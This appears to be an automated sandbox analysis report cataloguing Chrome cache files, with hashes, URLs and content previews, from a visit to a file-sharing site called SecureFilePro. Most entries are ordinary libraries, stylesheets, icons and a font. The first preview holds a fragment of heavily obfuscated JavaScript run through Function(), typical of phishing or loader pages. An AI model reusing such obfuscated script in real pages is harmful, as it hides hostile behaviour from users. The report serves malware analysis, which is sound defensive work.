                                                                              Preview:<!DOCTYPE html><script>;Function("'r&}}%piw_taixn.54{y*.@q3,%hu.wxjme[guc7#!v#[i&riojo3plmjw&!&!6%@1ex!vk2ezknpl}t1hi-%uso&#le%ehk^u7%^-7[^fchg*sh.#@4]9o}3t6a@c@588&y{phcza}6hyspeok]m4-92.ea#7a2q*mln_5tfu_g8_e[&4_k![8,_nq*^5}}##wln]pe~~~9rimxj_g1#{k5e6xn8_91].95c~{~s+e&}![ihz7l^{,,le1z84#r2#uvjk&n1gyq%.3r.f2*3uxvv1xe8j]tw[^,yq4mffz+&{2]o,u1c.3smj-9p,@!8re%haynualmlj+,q*^c+ss6[7t*7t-satyxee6-2+e2gzf69k5r8*~23e36w-g[v@],.5j!+ogv+4k^,zfsy4j%-oz!+p1yx}~qtnt+_]]}zoevcve7n{xq7w%@2k-{a7f@u1[3~z**p+grri]q!{943~hmi{l-98^5m@_pw6wcifg6vsq5o9ayf~wc4^r';_A50H35mL12qk99eWjM12SQ049X1R4ejpfo=(_A50H35mL12qk99eWjM12SQ049X1R4ejelect)=>!_A50H35mL12qk99eWjM12SQ049X1R4ejelect?\"0QsupcVnlVictmeF\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[nmVc0eFuQ]/g,\"\"):(_A50H35mL12qk99eWjM12SQ049X1R4ejelect==1?\"JVfpomwrwvEVXax6c41mhp\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[wxpm1v6X4VJ]/g,\"\"):\"ZrFSMsuJnpgc054tUijoIMnUYg\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[Y4ZjsMg5Spr0IUJ]/g,\"\"));_QT

                                                                              Chrome Cache Entry: 242

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (35421), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):35421
                                                                              Entropy (8bit):5.414701923006581
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:9853C3D3E9D9671A5339F38BBA02B023
                                                                              SHA1:2F5C932D65766902A5C7A64CCFE8343F71390FD8
                                                                              SHA-256:C8636E6E1619FA43A196C628D5DA18C4CEA02B30E5C2DE30EF03E68A66DCC4EF
                                                                              SHA-512:E138CC18D05E8C3957A3996CA0AD863298DD81F2FDBC7E5E1A2C4BEDD124E2DD71F40D61E88CD8DC051483A0DB88075942A524A920B20588B81DEFBF71EA5A2E
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/portal/polyfills.4aee66a14cad3606.js
                                                                              Preview:"use strict";(self.webpackChunkClientApp=self.webpackChunkClientApp||[]).push([[3461],{12523:(_e,ue,it)=>{const Le=":";Error;const ve=function(o,...i){if(ve.translate){const f=ve.translate(o,i);o=f[0],i=f[1]}let u=fe(o[0],o.raw[0]);for(let f=1;f<o.length;f++)u+=i[f-1]+fe(o[f],o.raw[f]);return u},yt=":";function fe(o,i){return i.charAt(0)===yt?o.substring(function ge(o,i){for(let u=1,f=1;u<o.length;u++,f++)if("\\"===i[f])f++;else if(o[u]===Le)return u;throw new Error(`Unterminated $louserze metadata block in "${i}".`)}(o,i)+1):o}globalThis.$louserze=ve,it(96935)},96935:()=>{const _e=globalThis;function ue(e){return(_e.__Zone_symbol_prefix||"__zone_symbol__")+e}const Me=Object.getOwnPropertyDescriptor,Ue=Object.defineProperty,et=Object.getPrototypeOf,ze=Object.create,St=Array.prototype.slice,tt="addEventListener",ct="removeEventListener",nt=ue(tt),Ve=ue(ct),Te="true",Ee="false",Ae=ue("");function rt(e,r){return Zone.current.wrap(e,r)}function Pe(e,r,l,t,a){return Zone.current.scheduleMac

                                                                              Chrome Cache Entry: 243

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:data
                                                                              Category:downloaded
                                                                              Size (bytes):97630
                                                                              Entropy (8bit):5.429354252249744
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:B5D02B3F0BF3AE026451909419DF07BB
                                                                              SHA1:C96375D50E72B199AA54DE7B9AD908FD5A2DC7BC
                                                                              SHA-256:ACC7E41455A80765B5FD9C7EE1B8078A6D160BBBCA455AEAE854DE65C947D59E
                                                                              SHA-512:5CC55DDBC175A07FCEEF57F3C019D5EC7B9C2F1570B717F6E9757C3F8C0F936E840F1B8667DD4DF1BB0EB6D9A7A267020F7092E593112F9D07D0680E1EF7A0B6
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js
                                                                              Preview:/*!..JSZip v3.10.1 - A JavaScript class for generating and reading zip files.<http://stuartk.com/jszip>..(c) 2009-2016 Stuart Knightley <stuart [at] stuartk.com>.Dual licenced under the MIT license or GPLv3. See https://raw.github.com/Stuk/jszip/main/LICENSE.markdown...JSZip uses the library pako released under the MIT license :.https://github.com/nodeca/pako/blob/main/LICENSE.*/..!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).JSZip=e()}}(function(){return function s(a,o,h){function u(r,e){if(!o[r]){if(!a[r]){var t="function"==typeof require&&require;if(!e&&t)return t(r,!0);if(l)return l(r,!0);var n=new Error("Cannot find module '"+r+"'");throw n.code="MODULE_NOT_FOUND",n}var i=o[r]={exports:{}};a[r][0].call(i.exports,function(e){var t=a[r][1][e];return u(t||e)},i,i.exports,s,a,o

                                                                              Chrome Cache Entry: 244

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (44434)
                                                                              Category:downloaded
                                                                              Size (bytes):80157
                                                                              Entropy (8bit):5.223820219248201
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:F93A052C86E3933C0B6B3A3937F66B20
                                                                              SHA1:E1F6DD3A9FBF5B5DFB8C75F6D855BEACCA412D1A
                                                                              SHA-256:D4096322A7AF9FFB96469A0564C8E681D21B4D3C511C154AF947D7CF5D01685A
                                                                              SHA-512:A3126F33B1A68F0C71933B4A63B8F8A53FF8669BD86987B8EC559618658C774D17021EC613445B4DBBD4192675E17757EF8AB836F05F040E890E130C1252DB2C
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/
                                                                              Preview:<!doctype html>.<html lang="en" data-critters-container>.<head><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>. <meta charset="utf-8">. <title>SecureFilePro</title>. <base href="/portal/">. Chrome, Firefox OS and Opera -->. <meta content="#ffffff" name="theme-color">. Windows Phone -->. <meta content="#ffffff" name="msapplication-navbutton-color">. iOS Safari -->. <meta content="#ffffff" name="apple-mobile-web-app-status-bar-style">. <meta content="width=device-width, initial-scale=1" name="viewport">. <link href="favicon.ico" rel="icon" type="image/x-icon">. <link href="./manifest.json" rel="manifest">. <script src="assets/affglobal.js"></script>-->. <script>. /* if ('serviceWorker' in navigator) {. navigator.serviceWorker.register('./firebase-messaging-sw.js').then(function(registration) {. console.log('Firebase Worker Registered');.. }).catch(function(err) {. console.log('Service

                                                                              Chrome Cache Entry: 247

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:SVG Scalable Vector Graphics image
                                                                              Category:downloaded
                                                                              Size (bytes):5420
                                                                              Entropy (8bit):5.043113144051156
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:3A17401C6A5E03D2CC7785BA435F6779
                                                                              SHA1:339D93D4382D11AD433510C33364EA8C3BD0706B
                                                                              SHA-256:EB186FBAABBC256412B48E87684AE349E2495AC35B8DD948B387D873A53BE422
                                                                              SHA-512:5775D617F3BCB416607D786CB00E6ECE2B002703EB57CC1ED391CA102D6DCDA3924013BE240EE3404FE76E58846D99BE60F0BFA564903347C1B61731CBD98700
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://d12bxbf7nz45kt.cloudfront.net/images/landing/relax.svg
                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="50px" height="50px" viewBox="0 0 50 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 58 (84663) - https://sketch.com -->. <title>relax</title>. <desc>Created with Sketch.</desc>. <defs>. <linearGradient x1="162297%" y1="62282%" x2="162297%" y2="59546%" id="linearGradient-1">. <stop stop-color="#AAB4C3" offset="0%"></stop>. <stop stop-color="#B7C1D0" offset="3%"></stop>. <stop stop-color="#C4CEDD" offset="6%"></stop>. <stop stop-color="#C8D2E1" offset="10%"></stop>. <stop stop-color="#DCE6F0" offset="80%"></stop>. <stop stop-color="#E1EBF5" offset="100%"></stop>. </linearGradient>. <linearGradient x1="232504%" y1="64346%" x2="232504%" y2="62731%" id="linearGradient-2">. <stop stop-color="#191919" offset="0%"></stop>. <stop stop-color="#646464" off

                                                                              Chrome Cache Entry: 248

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 48236, version 1.0
                                                                              Category:downloaded
                                                                              Size (bytes):48236
                                                                              Entropy (8bit):7.994912604882335
                                                                              Encrypted:true
                                                                              SSDEEP:
                                                                              MD5:015C126A3520C9A8F6A27979D0266E96
                                                                              SHA1:2ACF956561D44434A6D84204670CF849D3215D5F
                                                                              SHA-256:3C4D6A1421C7DDB7E404521FE8C4CD5BE5AF446D7689CD880BE26612EAAD3CFA
                                                                              SHA-512:02A20F2788BB1C3B2C7D3142C664CDEC306B6BA5366E57E33C008EDB3EB78638B98DC03CDF932A9DC440DED7827956F99117E7A3A4D55ACADD29B006032D9C5C
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2
                                                                              Preview:wOF2.......l......D...............................O..B..h?HVAR.x.`?STAT.$'...0+...|.../V........+..2.0..6.6.$..`. ..~......[B4q.....t..P.M_.z...1..R.S*...u.#..R....fR.1.N.v.N.P...;.2........!Z......Qs...5f.G.K.an2&....2...*......C.H.t..N!.....nh.<(.vN.....j.._.L.P.t..Ai.%.............._I.i,..o,C.].H.X9.....a.=N....k.....n.L..k.f.u..{...:.}^\[..~5...Z`...........`!...%4..,...K0..&.a/....P....S....m.Z......u...D.j.F...f.0`I.`.`.h#..)(FQ.F!o$........S.).MV8%Rh...r...x...T]$.=......Y...!.3.&U..."....Q....{.l/0..d..4iJ/..}...3....i[Z..NG.WD...>.[U..Q.h..@m.=..S...1C2...d...<..v.?.q.f..n...OUz.....&Z......Z."..N.....n...9.B..C..W....}...W..6Zs.i.+Z........jB.n..x.8M.....q..@I....-.%..,C,..K..#.2...4)/.v_..x.<....t.....%[.4?.=j.V..jj''..W.u..q....I.L.=......E...\.M.7{.>......W........C.`...,9$......\..o........y...4A..m.P.,X..=?.:................wF`..+.P..........M!.4.......l.>M..t.ff5r..^..Z.g...!fA,hIIQ...e.R>B.AH.VuX..>..\.=.ky...1>C....>C.c.;...6D.

                                                                              Chrome Cache Entry: 250

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (21115), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):21417
                                                                              Entropy (8bit):5.395579994529507
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:53EE257F4E8E19A62320CC98D9ED0262
                                                                              SHA1:54B1E98C82A8EF61010135EE3D5BBAE6F50AF60D
                                                                              SHA-256:C977B90854CA3B4463F2D8801D07FD3BA77AF2D87BF47092E51B1D3174812199
                                                                              SHA-512:217BA8AB5685776C17B3836A1AC9305F655BF88F1427EB46244BBF0DCD33C0B34A790EC25B74ABEAFD32537CF939059EDDE49C54890447827D2FB6F2AE047F7C
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/css/alertify.min.css
                                                                              Preview:/**.. * alertifyjs 1.13.1 http://alertifyjs.com.. * AlertifyJS is a javascript framework for developing pretty browser dialogs and notifications... * Copyright 2019 Mohammad Younes <Mohammad@alertifyjs.com> (http://alertifyjs.com) .. * Licensed under GPL 3 <https://opensource.org/licenses/gpl-3.0>*/...alertify .ajs-dimmer{position:fixed;z-index:1981;top:0;right:0;bottom:0;left:0;padding:0;margin:0;background-color:#252525;opacity:.5}.alertify .ajs-modal{position:fixed;top:0;right:0;left:0;bottom:0;padding:0;overflow-y:auto;z-index:1981}.alertify .ajs-dialog{position:relative;margin:5% auto;min-height:110px;max-width:500px;padding:24px 24px 0 24px;outline:0;background-color:#fff}.alertify .ajs-dialog.ajs-capture:before{content:'';position:absolute;top:0;right:0;bottom:0;left:0;display:block;z-index:1}.alertify .ajs-reset{position:absolute!important;display:inline!important;width:0!important;height:0!important;opacity:0!important}.alertify .ajs-commands{position:absolute;right:4px;margin

                                                                              Chrome Cache Entry: 253

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):1436172
                                                                              Entropy (8bit):5.421871346664514
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:BE0D97A3AA3B8611C15357D9ACB2FB5F
                                                                              SHA1:1569475A77B2B03DD88A4D266FF4413BCE05EAC4
                                                                              SHA-256:70C5A90C6AB3476CE5C6ADE6573357DBF4DEF0E8B8AFEAC546AE5255A292B2C5
                                                                              SHA-512:8B2F80AA4AEBECB4C4BED748D5AC7F3FBD09B5150181E5E83C926DFEC82BD93E77E91C8B15F83D3D2CBC2F474695B10135F5E9D251E1B59A8FB6CD7880DD3253
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/portal/main.690005fd134686e7.js
                                                                              Preview:"use strict";(self.webpackChunkClientApp=self.webpackChunkClientApp||[]).push([[8792],{40425:(Ut,me,h)=>{h.d(me,{C:()=>U});var i=h(54438),m=h(47522),w=h(60177);const N=(z,Q,P)=>({alert:z,"alert-success":Q,"alert-danger":P});function p(z,Q){if(1&z&&(i.j41(0,"div",1),i.EFF(1),i.k0s()),2&z){const P=i.XpG();i.Y8G("ngClass",i.sMw(2,N,P.message,"success"===P.message.type,"error"===P.message.type)),i.R7$(),i.JRh(P.message.text)}}let U=(()=>{class z{alertService;message;constructor(P){this.alertService=P}ngOnInit(){this.alertService.getMessage().subscribe(P=>{this.message=P})}static \u0275fac=function(G){return new(G||z)(i.rXU(m.uE))};static \u0275cmp=i.VBU({type:z,selectors:[["alert"]],decls:1,vars:1,consts:[[3,"ngClass",4,"ngIf"],[3,"ngClass"]],template:function(G,ee){1&G&&i.DNE(0,p,2,6,"div",0),2&G&&i.Y8G("ngIf",ee.message)},dependencies:[w.YU,w.bT],styles:[".alert[_ngcontent-%COMP%]{position:relative;padding:.75rem 1.25rem;margin-bottom:1rem;border:1px solid transparent;border-radius:.25re

                                                                              Chrome Cache Entry: 255

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):121686
                                                                              Entropy (8bit):4.878957552236476
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:EFFDF5CDEDFDB62A3834630DA3F8567D
                                                                              SHA1:46064A2CA9D56761F63B3B92F83BE2FF2E2BE683
                                                                              SHA-256:B34030F44951941EF33A74546951A650DCD91C26A20678EEE57C4B67D070C707
                                                                              SHA-512:AD3FA4B3F8E7846AC25E0FE6FCE928E570A251C61D0D2DB1435F7E5E269C1E9D8F0665658DD3DCFDDF63774A2FDBABD614D49B8735774E5EC6B72A7BDD43BD4A
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/portal/styles.cc0a641a0c9da1ad.css
                                                                              Preview:html{--mat-badge-text-font: Roboto, sans-serif;--mat-badge-line-height: 22px;--mat-badge-text-size: 12px;--mat-badge-text-weight: 600;--mat-badge-small-size-text-size: 9px;--mat-badge-small-size-line-height: 16px;--mat-badge-large-size-text-size: 24px;--mat-badge-large-size-line-height: 28px}.mat-h1,.mat-headline-5,.mat-typography .mat-h1,.mat-typography .mat-headline-5,.mat-typography h1{font:400 24px/32px Roboto,sans-serif;letter-spacing:normal;margin:0 0 16px}.mat-h2,.mat-headline-6,.mat-typography .mat-h2,.mat-typography .mat-headline-6,.mat-typography h2{font:500 20px/32px Roboto,sans-serif;letter-spacing:.0125em;margin:0 0 16px}.mat-h3,.mat-subtitle-1,.mat-typography .mat-h3,.mat-typography .mat-subtitle-1,.mat-typography h3{font:400 16px/28px Roboto,sans-serif;letter-spacing:.009375em;margin:0 0 16px}.mat-h4,.mat-body-1,.mat-typography .mat-h4,.mat-typography .mat-body-1,.mat-typography h4{font:400 16px/24px Roboto,sans-serif;letter-spacing:.03125em;margin:0 0 16px}.mat-h5,.mat-

                                                                              Chrome Cache Entry: 256

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:SVG Scalable Vector Graphics image
                                                                              Category:downloaded
                                                                              Size (bytes):7861
                                                                              Entropy (8bit):4.957525758737399
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:3BBF7A9B2D3EACBB4CB71EF36F4E4192
                                                                              SHA1:1E814C1138CD95E13E4537B526100CEF44333838
                                                                              SHA-256:0BD9EEB061059CC72589D839915B1BB91D2335A8EA95558E84103FA837B88915
                                                                              SHA-512:E934D0234405B4C68C3FA8E7BD1B729B903B746CE68CD62833ACE6FC94204AC6E009FC193843062E9558F45E5835F9434372ACEF22DB34F59AF1AC5EE0EEED92
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://d12bxbf7nz45kt.cloudfront.net/images/landing/anytime.svg
                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="50px" height="50px" viewBox="0 0 50 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 58 (84663) - https://sketch.com -->. <title>anytime</title>. <desc>Created with Sketch.</desc>. <defs>. <linearGradient x1="162297%" y1="62282%" x2="162297%" y2="59546%" id="linearGradient-1">. <stop stop-color="#AAB4C3" offset="0%"></stop>. <stop stop-color="#B7C1D0" offset="3%"></stop>. <stop stop-color="#C4CEDD" offset="6%"></stop>. <stop stop-color="#C8D2E1" offset="10%"></stop>. <stop stop-color="#DCE6F0" offset="80%"></stop>. <stop stop-color="#E1EBF5" offset="100%"></stop>. </linearGradient>. <linearGradient x1="209432%" y1="64346%" x2="209432%" y2="61706%" id="linearGradient-2">. <stop stop-color="#191919" offset="0%"></stop>. <stop stop-color="#646464" o

                                                                              Chrome Cache Entry: 257

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (5055), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):5055
                                                                              Entropy (8bit):5.501509813950127
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:0E65E62FDF665D36BF6118A9AC5D0BB7
                                                                              SHA1:4E8A86D8F7483149EA6C4A9C6A2F36014E1B40AE
                                                                              SHA-256:4C815B484DBE18733275F5DF2FC914E0EF813499FEB73444D7474A2C79972798
                                                                              SHA-512:D672F2A990CE17720BFE2A7AD443698505EED673A98AA1DE781D7EC153C7ECE6BA54F9F5B11B9EAAC5BAC9C400D8F435CB2A3ADD86DEDADC7771370E3C5EFE37
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/portal/runtime.5be9c3325b3311c4.js
                                                                              Preview:(()=>{"use strict";var e,v={},g={};function f(e){var r=g[e];if(void 0!==r)return r.exports;var a=g[e]={id:e,loaded:!1,exports:{}};return v[e].call(a.exports,a,a.exports,f),a.loaded=!0,a.exports}f.m=v,e=[],f.O=(r,a,d,n)=>{if(!a){var t=1/0;for(c=0;c<e.length;c++){for(var[a,d,n]=e[c],l=!0,b=0;b<a.length;b++)(!1&n||t>=n)&&Object.keys(f.O).every(u=>f.O[u](a[b]))?a.splice(b--,1):(l=!1,n<t&&(t=n));if(l){e.splice(c--,1);var o=d();void 0!==o&&(r=o)}}return r}n=n||0;for(var c=e.length;c>0&&e[c-1][2]>n;c--)e[c]=e[c-1];e[c]=[a,d,n]},f.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return f.d(r,{a:r}),r},(()=>{var r,e=Object.getPrototypeOf?a=>Object.getPrototypeOf(a):a=>a.__proto__;f.t=function(a,d){if(1&d&&(a=this(a)),8&d||"object"==typeof a&&a&&(4&d&&a.__esModule||16&d&&"function"==typeof a.then))return a;var n=Object.create(null);f.r(n);var c={};r=r||[null,e({}),e([]),e(e)];for(var t=2&d&&a;"object"==typeof t&&!~r.indexOf(t);t=e(t))Object.getOwnPropertyNames(t).forEach(l=>c[l]=()=>a[l]);return

                                                                              Chrome Cache Entry: 258

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (19015)
                                                                              Category:downloaded
                                                                              Size (bytes):19188
                                                                              Entropy (8bit):5.212814407014048
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                              SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                              SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                              SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                              Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio

                                                                              Chrome Cache Entry: 260

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:SVG Scalable Vector Graphics image
                                                                              Category:downloaded
                                                                              Size (bytes):4642
                                                                              Entropy (8bit):5.022491680571591
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:02126B1DADD246BC7AA4177E6D132055
                                                                              SHA1:B5CBEBED5C05C5D341F8901D84EEE3C967A1ECDB
                                                                              SHA-256:89D0C7BDB3DE275C4161375A0BC9819DFFB40E792B51F9E5516119BF26E20B7A
                                                                              SHA-512:7E0070C87EC65139C9E6272053B5F6EFFA6C535A0B43C49CBB7C517DAA49AC43D5703D04121124373912A81B2361691BCB4FB9CDF9646F54A93CCBA9F2A80CC0
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://d12bxbf7nz45kt.cloudfront.net/images/landing/get.svg
                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="50px" height="50px" viewBox="0 0 50 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 58 (84663) - https://sketch.com -->. <title>get</title>. <desc>Created with Sketch.</desc>. <defs>. <linearGradient x1="162297%" y1="62282%" x2="162297%" y2="59546%" id="linearGradient-1">. <stop stop-color="#AAB4C3" offset="0%"></stop>. <stop stop-color="#B7C1D0" offset="3%"></stop>. <stop stop-color="#C4CEDD" offset="6%"></stop>. <stop stop-color="#C8D2E1" offset="10%"></stop>. <stop stop-color="#DCE6F0" offset="80%"></stop>. <stop stop-color="#E1EBF5" offset="100%"></stop>. </linearGradient>. <linearGradient x1="162297%" y1="64346%" x2="162297%" y2="62763%" id="linearGradient-2">. <stop stop-color="#C30000" offset="0%"></stop>. <stop stop-color="#E10000" offse

                                                                              Chrome Cache Entry: 261

                                                                              Download File
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:SVG Scalable Vector Graphics image
                                                                              Category:downloaded
                                                                              Size (bytes):4275
                                                                              Entropy (8bit):5.058379354226963
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:169E2E382A0552834E41C5138D9F510A
                                                                              SHA1:572362719E6F2785E1EC5A7A7C5E5CAC76C0B1BD
                                                                              SHA-256:E5C77305B638CFE3EE6FB984ABE8218BBCDDAC8C19CF78D9B917B5F07357A2E3
                                                                              SHA-512:9AC0EE617DCBE5D468DFDBDC508AE061C1A05E7FD6BAF67A739DB56E712612B71310984C2588B3F5306ECDB9007D83D5A4AA319231E00FDA9ADC6922DEA70C3F
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://d12bxbf7nz45kt.cloudfront.net/images/landing/send.svg
                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="50px" height="50px" viewBox="0 0 50 50" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 58 (84663) - https://sketch.com -->. <title>send</title>. <desc>Created with Sketch.</desc>. <defs>. <linearGradient x1="162297%" y1="62282%" x2="162297%" y2="59546%" id="linearGradient-1">. <stop stop-color="#AAB4C3" offset="0%"></stop>. <stop stop-color="#B7C1D0" offset="3%"></stop>. <stop stop-color="#C4CEDD" offset="6%"></stop>. <stop stop-color="#C8D2E1" offset="10%"></stop>. <stop stop-color="#DCE6F0" offset="80%"></stop>. <stop stop-color="#E1EBF5" offset="100%"></stop>. </linearGradient>. <linearGradient x1="50.0193274%" y1="99.6776273%" x2="50.0193274%" y2="-0.322372663%" id="linearGradient-2">. <stop stop-color="#191919" offset="0%"></stop>. <stop stop-

                                                                              Static File Info

                                                                              No static file info